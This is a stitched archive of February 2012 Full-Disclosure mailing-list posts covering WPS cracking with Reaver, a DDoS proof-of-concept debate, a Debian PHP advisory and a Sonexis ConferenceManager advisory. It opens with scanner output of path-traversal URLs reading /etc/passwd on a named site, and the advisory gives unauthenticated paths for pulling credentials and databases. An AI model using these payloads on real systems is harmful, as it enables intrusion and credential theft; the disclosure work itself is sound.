http://www.novell.com/servlet/CRS?reference_name=-op=%25Action=Start+SearchSubmit=Start+Searchsource=../../../../../../../../../../etc/passwd%00.cssfull_text_limit=showcase_verbiage+%2C+press_releaseMaxRows=0; [15] | [+] Vul[15] [LFI] http://www.novell.com/servlet/CRS?reference_name=-op=%25Action=Start+SearchSubmit=Start+Searchsource=../../../../../../../../../../etc/passwd%00.htmlfull_text_limit=showcase_verbiage+%2C+press_releaseMaxRows=0; [16] | [+] Vul[16] [LFI] http://www.novell.com/servlet/CRS?reference_name=-op=%25Action=Start+SearchSubmit=Start+Searchsource=../../../../../../../../../../etc/passwd%00.txtfull_text_limit=showcase_verbiage+%2C+press_releaseMaxRows=0; [17] | [+] Vul[17] [LFI] http://www.novell.com/servlet/CRS?reference_name=-op=%25Action=Start+SearchSubmit=Start+Searchsource=../../../../../../../../../../etc/passwd%00.phpfull_text_limit=showcase_verbiage+%2C+press_releaseMaxRows=0; [18] | [+] Vul[18] [LFI] http://www.novell.com/servlet/CRS?reference_name=-op=%25Action=Start+SearchSubmit=Start+Searchsource=../../../../../../../../../../etc/passwd%00.incfull_text_limit=showcase_verbiage+%2C+press_releaseMaxRows=0; [19] | [+] Vul[19] [LFI] http://www.novell.com/servlet/CRS?reference_name=-op=%25Action=Start+SearchSubmit=Start+Searchsource=../../../../../../../../../../etc/passwd%00.pngfull_text_limit=showcase_verbiage+%2C+press_releaseMaxRows=0; [20] | [+] Vul[20] [LFI] http://www.novell.com/servlet/CRS?reference_name=-op=%25Action=Start+SearchSubmit=Start+Searchsource=//../../../../../../../../etc/passwd%00full_text_limit=showcase_verbiage+%2C+press_releaseMaxRows=0; [21] | [+] Vul[21] [LFI] http://www.novell.com/servlet/CRS?reference_name=-op=%25Action=Start+SearchSubmit=Start+Searchsource=//../../../../../../../../etc/passwd%00enfull_text_limit=showcase_verbiage+%2C+press_releaseMaxRows=0; [22] | [+] Vul[22] [LFI] http://www.novell.com/servlet/CRS?reference_name=-op=%25Action=Start+SearchSubmit=Start+Searchsource=/../..//../..//../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd%00full_text_limit=showcase_verbiage+%2C+press_releaseMaxRows=0; [23] | [+] Vul[23] [LFI]
Re: [Full-disclosure] Trustwave and Mozilla
On Sun, Feb 12, 2012 at 10:54 AM, Jeffrey Walton noloa...@gmail.com wrote: https://www.infoworld.com/d/security/trustwave-admits-issuing-man-in-the-middle-digital-certificate-185972 In case folks are interested in the following Mozilla's response to active MitM attacks that were facilitated by Trustwave, the bug report is here: http://bugzilla.mozilla.org/show_bug.cgi?id=724929. Can anyone confirm that Trustwave CA certificates in the local Mozilla certificate store are the ones with names containing the word SecureTrust ? I want to disable Trustwave CAs on all my local systems, but am not certain which are the relevant ones. For some benighted reason, the word Trustwave is not present in any of the certificate names in the FF certificate store on WinXP or Debian (Iceweasel). Ironically of course, the word trust appears everywhere :) I found a page at mozilla.org which appears to show all CAs included with FF, and that Trustwave certificates are labelled SecureTrust : http://www.mozilla.org/projects/security/certs/included/ but I would like confirmation from Someone Who Knows Better. Be advised: the above page appears to be some kind of .. [recoils in horror] .. XML which doesn't render properly on WinXP, but renders fine on Debian Linux. Maybe there's some XSL needed somewhere. Cheers Nick -- XML is like violence. If it doesn't solve the problem, use more. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Trustwave and Mozilla
On Mon, Feb 13, 2012 at 4:18 PM, Nick Boyce nick.bo...@gmail.com wrote: http://www.mozilla.org/projects/security/certs/included/ Be advised: the above page appears to be some kind of .. [recoils in horror] .. XML which doesn't render properly on WinXP, but renders fine on Debian Linux. Maybe there's some XSL needed somewhere. OT: that problem was actually caused by having XSLT disabled in NoScript options on the WinXP box - sorry for the misdirection. Nick -- Leave the Olympics in Greece, where they belong. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Arbitrary DDoS PoC
Absolutely and that's partly my point. The methods you describe are neigh exactly how modern general ddos techniques work, which is not how this works. One problem is you can't use Facebook or Google as an open proxy like you're saying because 1.) It assumes you can force Google or Facebook to make multiple requests for just one of your requests, else you are still being stuck to how much you can output vs how much they can take. Just because you can tweak how much you can send does not change the basic principal behind this and 2.) It no longer becomes a general method because you must abuse a particular flaw in a particular service to get it to use its resources to flood the targets resources. Not trying to really argue your examples, I'm just saying his script and his bug report or whatever you call it is terribly ineffective as a general method compared to pretty standard techniques like you described, and does not abuse any implementation or protocol to be a specific flaw a la the Apache dos bug a few months ago. It's like he's claiming he found the new smurf attack when all the attack is a script calling curl through a proxy, torrenting the latest distro install disk is a bigger DoS technique than this. On Feb 13, 2012 5:48 AM, adam a...@papsy.net wrote: I have to admit that I've only read the posts here, haven't actually followed the link, but in response to Gage: It entirely depends on how it's being done, specifically: what services/applications are being targeted and in what way. If he's proxying through big servers such as those owned by Facebook, Google, Wikipedia, etc: then it definitely does make a difference. You're assuming that his network speed would be the bottleneck, but to make that assumption, you first have to assume that he's actually waiting around for response data. Maybe it's too early to convey this in an understandable way, I don't know. An example scenario that would be effective though: imagine that you run a web server, also imagine that there's a resource (CPU/bandwidth) intensive script/page on that server. For the sake of discussion, let's assume that my home internet speed is 1/10 of your server. We can also probably assume that your server's network speed is 1/10 of Google's. If I can force Google's server to request that page, that automatically puts me at an advantage (especially if I close the connection before Google can send the response back to me). Even if you're correct about his particular script, the logic behind your response is flawed. In the above example, one could use multithreading to cycle requests to your server through Google, Facebook, Wikipedia, whoever. As soon as the request has been sent, the connection could be terminated. If that for some reason wouldn't work, the script could wait until one byte is received (e.g. the 2 in 200 OK) and close the connection then. At that point, the bandwidth/resources would have already been used. The bottom line is that you could easily use the above concepts (and likely what the OP has designed) to overpower a server/service while using very little resources of your own. It's all circumstantial anyway though. My overall point, specifics aside, is that being able to use Google or Facebook's resources against a target is definitely beneficial and has all kinds of advantages. On Mon, Feb 13, 2012 at 7:17 AM, Gage Bystrom themadichi...@gmail.comwrote: Uhh...looks pretty standard boss. You aren't going to DoS a halfway decent server with that using a single box. Sending your request through multiple proxies does not magically increase the resource usage of the target, its still your output power vs their input pipe. Sure it gives a slight boost in anonymity and obfuscation but does not actually increase effectiveness. It would even decrease effectiveness because you bear the burden of having to send to a proxy, giving them ample time to recover from a given request. Even if you look at it as a tactic to bypass blacklisting, you still aren't going to overwhelm the server. That means you need more pawns to do your bidding. This creates a bit of a problem however as then all your slaves are running through a limited selection of proxies, reducing the amount of threats the server needs to blacklist. The circumvention is quite obvious, which is to not utilize proxies for the pawnsand rely on shear numbers and/or superior resource exhaustion methods On Feb 13, 2012 4:37 AM, Lucas Fernando Amorim lf.amo...@yahoo.com.br wrote: With the recent wave of DDoS, a concern that was not taken is the model where the zombies were not compromised by a Trojan. In the standard modeling of DDoS attack, the machines are purchased, usually in a VPS, or are obtained through Trojans, thus forming a botnet. But the arbitrary shape doesn't need acquire a collection of computers. Programs, servers and protocols are used to arbitrarily make requests on the target. P2P
[Full-disclosure] [SECURITY] [DSA 2408-1] php5 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2408-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff February 13, 2012 http://www.debian.org/security/faq - - Package: php5 Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2011-1072 CVE-2011-4153 CVE-2012-0781 CVE-2012-0788 CVE-2012-0831 Several vulnerabilities have been discovered in PHP, the web scripting language. The Common Vulnerabilities and Exposures project identifies the following issues: CVE-2011-1072 It was discoverd that insecure handling of temporary files in the PEAR installer could lead to denial of service. CVE-2011-4153 Maksymilian Arciemowicz discovered that a NULL pointer dereference in the zend_strndup() function could lead to denial of service. CVE-2012-0781 Maksymilian Arciemowicz discovered that a NULL pointer dereference in the tidy_diagnose() function could lead to denial of service. CVE-2012-0788 It was discovered that missing checks in the handling of PDORow objects could lead to denial of service. CVE-2012-0831 It was discovered that the magic_quotes_gpc setting could be disabled remotely This update also addresses PHP bugs, which are not treated as security issues in Debian (see README.Debian.security), but which were fixed nonetheless: CVE-2010-4697, CVE-2011-1092, CVE-2011-1148, CVE-2011-1464, CVE-2011-1467 CVE-2011-1468, CVE-2011-1469, CVE-2011-1470, CVE-2011-1657, CVE-2011-3182 CVE-2011-3267 For the stable distribution (squeeze), this problem has been fixed in version 5.3.3-7+squeeze8. For the unstable distribution (sid), this problem has been fixed in version 5.3.10-1. We recommend that you upgrade your php5 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk85UWQACgkQXm3vHE4uylpctACgq86Xv2nCaiL0lQKW9O4du1uD IAMAoMj3NIwViJ7UvJTQ9wVNn4TFqpcD =TR0I -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Arbitrary DDoS PoC
Ah what a wonderful gem of pure and real research into todays upcoming threats. Today is the day we learn to phear sites like xroxy.com because God forbid some of those silly kids using their 9001 proxies from their 56k dial-ups will over-run google, youtube, facebook, and the world! Dear God what will we do?!?!? When will it end! Think of the cute kittens you deprive us of evil proxy hackers! Today is the day I learned hackers can cast magick upon outgoing packets through proxies to somehow make them more bigger. I propose these are some kind of Christian hackers with God on their side to manipulate the very foundational laws of physics and electricity! Excuse me Mr. Amorim but what God alas do you pray to for this? Is it some kind of Christian Magick? On Sun, Feb 12, 2012 at 9:09 AM, Lucas Fernando Amorim lf.amo...@yahoo.com.br wrote: With the recent wave of DDoS, a concern that was not taken is the model where the zombies were not compromised by a Trojan. In the standard modeling of DDoS attack, the machines are purchased, usually in a VPS, or are obtained through Trojans, thus forming a botnet. But the arbitrary shape doesn't need acquire a collection of computers. Programs, servers and protocols are used to arbitrarily make requests on the target. P2P programs are especially vulnerable, DNS, internet proxies, and many sites that make requests of user like Facebook or W3C, also are. Precisely I made a proof-of-concept script of 60 lines hitting most of HTTP servers on the Internet, even if they have protections likely mod_security, mod_evasive. This can be found on this link [1] at GitHub. The solution of the problem depends only on the reformulation of protocols and limitations on the number of concurrent requests and totals by proxies and programs for a given site, when exceeded returning a cached copy of the last request. [1] https://github.com/lfamorim/barrelroll Cheers, Lucas Fernando Amorim http://twitter.com/lfamorim ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Attacking the Phishers: An Autopsy on Compromised Phishing Websites
InfoSec Institute researcher Quaker Doomer explores various phishing sites to see what the phishers are doing behind the scenes: http://resources.infosecinstitute.com/attacking-the-phishers/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] fasmaes-1.0.tar.gz - An AES implementation for Flat Assembler (FASM)
yo was geht? DESCRIPTION === An AES-128, AES-192 and AES-256 implementation for FASM. Uses the the x86 32-bit instruction set and operates completely on the stack. No additional data segments are necessary which makes it easy to integrate the AES functions in any existing project. The implementation is not optimized for speed but for easy maintainability. File can be found at http://www.nullsecurity.net/tools.html cheers, noptrix -- Name: Levon 'noptrix' Kayan E-Mail: nopt...@nullsecurity.net GPG key: 0x014652c0 Key fingerprint: ABEF 4B4B 5D93 32B8 D423 A623 823D 4162 0146 52C0 Homepage: http://www.nullsecurity.net/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.
i have tested reaver on a netgear and linksys (dont have model nos. with me) with wps disabled and enabled. the wps setting did not matter and both were vulnerable. was able to recover wpa2 passphrase in ~4 hrs on both. On Mon, Feb 13, 2012 at 8:32 AM, Dan Kaminsky d...@doxpara.com wrote: Steve while he's often derided goes into this very well. Many cisco's only stop advertising wps when it is off but wps actually still exists...which means they are still easily hackable. Have you directly confirmed a WPS exchange can occur even on devices that aren't advertising support? That would indeed be a quick and dirty way to turn the feature off. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.
That's a fairly significant finding. Can anyone else confirm the existence of devices that still fall to Reaver even when WPS is disabled? Chris, when you run: iw scan wlan0 | grep “Config methods” Do you see a difference in advertised methods? On Mon, Feb 13, 2012 at 3:58 PM, chris nelson sleekmountain...@gmail.comwrote: i have tested reaver on a netgear and linksys (dont have model nos. with me) with wps disabled and enabled. the wps setting did not matter and both were vulnerable. was able to recover wpa2 passphrase in ~4 hrs on both. On Mon, Feb 13, 2012 at 8:32 AM, Dan Kaminsky d...@doxpara.com wrote: Steve while he's often derided goes into this very well. Many cisco's only stop advertising wps when it is off but wps actually still exists...which means they are still easily hackable. Have you directly confirmed a WPS exchange can occur even on devices that aren't advertising support? That would indeed be a quick and dirty way to turn the feature off. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.
i believe that disabling wps on router still leaves some routers vulnerable was reported on before. from http://arstechnica.com/business/news/2012/01/hands-on-hacking-wifi-protected-setup-with-reaver.ars Having demonstrated the insecurity of WPS, I went into the Linksys' administrative interface and turned WPS off. Then, I relaunched Reaver, figuring that surely setting the router to manual configuration would block the attacks at the door. But apparently Reaver didn't get the memo, and the Linksys' WPS interface still responded to its queries—once again coughing up the password and SSID. the testing i did was in early-mid jan, ill verify my findings again. at work now, but will let you know about config methods. On Mon, Feb 13, 2012 at 2:57 PM, Dan Kaminsky d...@doxpara.com wrote: That's a fairly significant finding. Can anyone else confirm the existence of devices that still fall to Reaver even when WPS is disabled? Chris, when you run: iw scan wlan0 | grep “Config methods” Do you see a difference in advertised methods? On Mon, Feb 13, 2012 at 3:58 PM, chris nelson sleekmountain...@gmail.comwrote: i have tested reaver on a netgear and linksys (dont have model nos. with me) with wps disabled and enabled. the wps setting did not matter and both were vulnerable. was able to recover wpa2 passphrase in ~4 hrs on both. On Mon, Feb 13, 2012 at 8:32 AM, Dan Kaminsky d...@doxpara.com wrote: Steve while he's often derided goes into this very well. Many cisco's only stop advertising wps when it is off but wps actually still exists...which means they are still easily hackable. Have you directly confirmed a WPS exchange can occur even on devices that aren't advertising support? That would indeed be a quick and dirty way to turn the feature off. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.
also here: http://www.backtrack-linux.org/forums/showthread.php?t=47038 and here: http://adaywithtape.blogspot.com/2012/01/cracking-wpa-using-wps-vulnerability.html On Mon, Feb 13, 2012 at 4:09 PM, chris nelson sleekmountain...@gmail.comwrote: i believe that disabling wps on router still leaves some routers vulnerable was reported on before. from http://arstechnica.com/business/news/2012/01/hands-on-hacking-wifi-protected-setup-with-reaver.ars Having demonstrated the insecurity of WPS, I went into the Linksys' administrative interface and turned WPS off. Then, I relaunched Reaver, figuring that surely setting the router to manual configuration would block the attacks at the door. But apparently Reaver didn't get the memo, and the Linksys' WPS interface still responded to its queries—once again coughing up the password and SSID. the testing i did was in early-mid jan, ill verify my findings again. at work now, but will let you know about config methods. On Mon, Feb 13, 2012 at 2:57 PM, Dan Kaminsky d...@doxpara.com wrote: That's a fairly significant finding. Can anyone else confirm the existence of devices that still fall to Reaver even when WPS is disabled? Chris, when you run: iw scan wlan0 | grep “Config methods” Do you see a difference in advertised methods? On Mon, Feb 13, 2012 at 3:58 PM, chris nelson sleekmountain...@gmail.com wrote: i have tested reaver on a netgear and linksys (dont have model nos. with me) with wps disabled and enabled. the wps setting did not matter and both were vulnerable. was able to recover wpa2 passphrase in ~4 hrs on both. On Mon, Feb 13, 2012 at 8:32 AM, Dan Kaminsky d...@doxpara.com wrote: Steve while he's often derided goes into this very well. Many cisco's only stop advertising wps when it is off but wps actually still exists...which means they are still easily hackable. Have you directly confirmed a WPS exchange can occur even on devices that aren't advertising support? That would indeed be a quick and dirty way to turn the feature off. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.
On Mon, Feb 13, 2012 at 1:57 PM, Dan Kaminsky d...@doxpara.com wrote: That's a fairly significant finding. Can anyone else confirm the existence of devices that still fall to Reaver even when WPS is disabled? The Netgear N750 definitely does. I can rummage through my Box'o'Stuff and see if I have any more wireless APs... It looks like the Belkin routers don't. After disabling WPS, reaver just hung after hitting the channel the AP was on. Re-enabling, reaver went right to work. Just in case anyone hasn't figured out how to use it yet, I did an in-house presentation a few weeks ago: http://www.n2netsec.com/site/index.php?option=com_contentview=sectionlayout=blogid=5Itemid=89 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.
Well, what this all tells me is that my process of simply checking for advertised configuration methods understates the number of nodes actually vulnerable. Reaver should be modifiable into an active scanner, at least. On Mon, Feb 13, 2012 at 7:09 PM, Ian Hayes cthulhucall...@gmail.com wrote: On Mon, Feb 13, 2012 at 1:57 PM, Dan Kaminsky d...@doxpara.com wrote: That's a fairly significant finding. Can anyone else confirm the existence of devices that still fall to Reaver even when WPS is disabled? The Netgear N750 definitely does. I can rummage through my Box'o'Stuff and see if I have any more wireless APs... It looks like the Belkin routers don't. After disabling WPS, reaver just hung after hitting the channel the AP was on. Re-enabling, reaver went right to work. Just in case anyone hasn't figured out how to use it yet, I did an in-house presentation a few weeks ago: http://www.n2netsec.com/site/index.php?option=com_contentview=sectionlayout=blogid=5Itemid=89 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.
That's definitely not a good thing if it's found to be the case across more of the vendors. Is it the intent of the of the column on the google docs spreadsheet (WPS can be disabled and it stays off), to include confirmation of the retest after the WPS setting has been disabled? I wonder if everyone retested after the option was turned off? I hope so. Thanks Derek On 14/02/2012, at 9:40 AM, chris nelson sleekmountain...@gmail.com wrote: i believe that disabling wps on router still leaves some routers vulnerable was reported on before. from http://arstechnica.com/business/news/2012/01/hands-on-hacking-wifi-protected-setup-with-reaver.ars Having demonstrated the insecurity of WPS, I went into the Linksys' administrative interface and turned WPS off. Then, I relaunched Reaver, figuring that surely setting the router to manual configuration would block the attacks at the door. But apparently Reaver didn't get the memo, and the Linksys' WPS interface still responded to its queries—once again coughing up the password and SSID. the testing i did was in early-mid jan, ill verify my findings again. at work now, but will let you know about config methods. On Mon, Feb 13, 2012 at 2:57 PM, Dan Kaminsky d...@doxpara.com wrote: That's a fairly significant finding. Can anyone else confirm the existence of devices that still fall to Reaver even when WPS is disabled? Chris, when you run: iw scan wlan0 | grep “Config methods” Do you see a difference in advertised methods? On Mon, Feb 13, 2012 at 3:58 PM, chris nelson sleekmountain...@gmail.comwrote: i have tested reaver on a netgear and linksys (dont have model nos. with me) with wps disabled and enabled. the wps setting did not matter and both were vulnerable. was able to recover wpa2 passphrase in ~4 hrs on both. On Mon, Feb 13, 2012 at 8:32 AM, Dan Kaminsky d...@doxpara.com wrote: Steve while he's often derided goes into this very well. Many cisco's only stop advertising wps when it is off but wps actually still exists...which means they are still easily hackable. Have you directly confirmed a WPS exchange can occur even on devices that aren't advertising support? That would indeed be a quick and dirty way to turn the feature off. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.
dan, does the wash tool included with reaver check for advertised config methods? if not and it does some more in depth analysis to determine if an ap is vuln,, that might be the active scanner youre looking for. On Mon, Feb 13, 2012 at 5:27 PM, Derek Grocke de...@madrock.net wrote: That's definitely not a good thing if it's found to be the case across more of the vendors. Is it the intent of the of the column on the google docs spreadsheet (WPS can be disabled and it stays off), to include confirmation of the retest after the WPS setting has been disabled? I wonder if everyone retested after the option was turned off? I hope so. Thanks Derek On 14/02/2012, at 9:40 AM, chris nelson sleekmountain...@gmail.com wrote: i believe that disabling wps on router still leaves some routers vulnerable was reported on before. from http://arstechnica.com/business/news/2012/01/hands-on-hacking-wifi-protected-setup-with-reaver.ars Having demonstrated the insecurity of WPS, I went into the Linksys' administrative interface and turned WPS off. Then, I relaunched Reaver, figuring that surely setting the router to manual configuration would block the attacks at the door. But apparently Reaver didn't get the memo, and the Linksys' WPS interface still responded to its queries—once again coughing up the password and SSID. the testing i did was in early-mid jan, ill verify my findings again. at work now, but will let you know about config methods. On Mon, Feb 13, 2012 at 2:57 PM, Dan Kaminsky d...@doxpara.com wrote: That's a fairly significant finding. Can anyone else confirm the existence of devices that still fall to Reaver even when WPS is disabled? Chris, when you run: iw scan wlan0 | grep “Config methods” Do you see a difference in advertised methods? On Mon, Feb 13, 2012 at 3:58 PM, chris nelson sleekmountain...@gmail.com wrote: i have tested reaver on a netgear and linksys (dont have model nos. with me) with wps disabled and enabled. the wps setting did not matter and both were vulnerable. was able to recover wpa2 passphrase in ~4 hrs on both. On Mon, Feb 13, 2012 at 8:32 AM, Dan Kaminsky d...@doxpara.com wrote: Steve while he's often derided goes into this very well. Many cisco's only stop advertising wps when it is off but wps actually still exists...which means they are still easily hackable. Have you directly confirmed a WPS exchange can occur even on devices that aren't advertising support? That would indeed be a quick and dirty way to turn the feature off. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Netragard, Inc - Security Advisory] [Sonexis ConferenceManager Multiple Vulnerabilities]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Netragard Security Advisory - Sonexis ConferenceManager - 20120201 [POSTING NOTICE] If you intend to post this advisory on your web page please create a link back to the original Netragard advisory as the contents of the advisory may change. For more information about Netragard visit: http://www.netragard.com [Advisory Information] Contact : sa...@netragard.com Advisory ID : NETRAGARD-20120201 Researcher : Titon Product Name : Sonexis ConferenceManager Product Version : All Versions up to 10.x Vendor Name:Sonexis Technology, Inc. Type of Vulnerability : Authorization Failure, Credential Leak Impact : Network Compromise / Critical Date Discovered : 01/25/2012 Vendor Notified : 01/31/2012 [Product Description] ConferenceManager plugs right into your current networks, leveraging your existing investments -- no need for costly upgrades or new infrastructure. And, because you own your equipment, you can scale the number and size of your conferences without scaling your costs. Say goodbye to those pay-as-you go subscription costs and say hello to savings as high as 80% Taken From: http://www.sonexis.com/products/index.asp [Technical Summary] | Vulnerability 1 | The Sonexis ConferenceManager publishes credentials (often domain credentials) to a web page that is accessible without authentication. In many cases these credentials can be used to access otherwise sensitive and restricted resources that include but are not limited to sharepoint, vpn services, etc. | Vulnerability 2 | The Sonexis ConferenceManager database can be downloaded, modified, and uploaded again by anyone. This can result in the theft of audio recordings and potentially sensitive data as well as a compromise of the system. [Technical Details] The Sonexis ConferenceManager fails to properly check and enforce authorization boundaries. Any user that can access the Sonexis ConferenceManager's web interface can access the settings.asp page without restriction or authentication. This page provides an attacker with two opportunities which are: | Vulnerability 1 | [1] The settings.asp page discloses sensitive credentials. These credentials vary between installs but seem to fall into three categories which are: - - Domain Credentials (with or without admin privileges) - - System Credentials (local user) - - Not Yet Set(page not yet used?) Netragard discovered this vulnerability during a customer engagement. Netragard was able to use this vulnerability to compromise the customers entire IT infrastructure including the Domain Controller. [2] The settings.asp page allows anyone to download the entire Sonexis ConferenceManager SQL database without authentication. Once downloaded the attacker can modify the database and may be able to upload the modified database back to the Sonexis ConferenceManager. | Vulnerability 2 | [1] The download.asp page is accessible without authentication. This page allows anyone to download the contents of the Sonexis ConferenceManager database. The contents (shown in the exploitation section) include audio recordings, configuration settings, etc. The original file is a zip file that when decompressed produces multiple SQL files. [2] The upload.asp page is accessible without authentication. This page allows anyone to upload a backed up version of the Sonexis ConfrenceManager database to the system. This can be used to compromise the system if an attacker injects a backdoor into the SQL database. Other attacks may be possible with the upload feature. NOTE: An attacker can use search engines like Google, Yahoo, Bing, etc. to identify vulnerable Sonexis ConfrenceManager systems. To demonstrate this Netragard created a Proof of Concept Google scanner and was able to identify the following ConferenceManager versions, each of which is vulnerable. The scanner was limited to a 50 identifications. Number IdentifiedVersionVulnerable - - ----- 2 10.0.40Yes 2 6.1.39Yes 1 8.0.15Yes 1 9.1.18Yes 5 9.2.11Yes 26 9.3.14Yes [Proof Of Concept] Exploiting Vulnerability 1 No exploit required. Simply open your favorite web browser and visit your Sonexis ConferenceManager web interface. Then append /admin/backup/settings.asp to the URI as shown below. http://YOUR SONEXIS URL/admin/backup/settings.asp To extract credentials view the source and search for the following text. INPUT TYPE=text NAME=uid value=X-- Username INPUT TYPE=PASSWORD NAME=pwd value=X-- Password |Exploiting Vulnerability 2, Download| No exploit or authentication is required to download or upload the Sonexis ConferenceManager database. To download the db you must first install
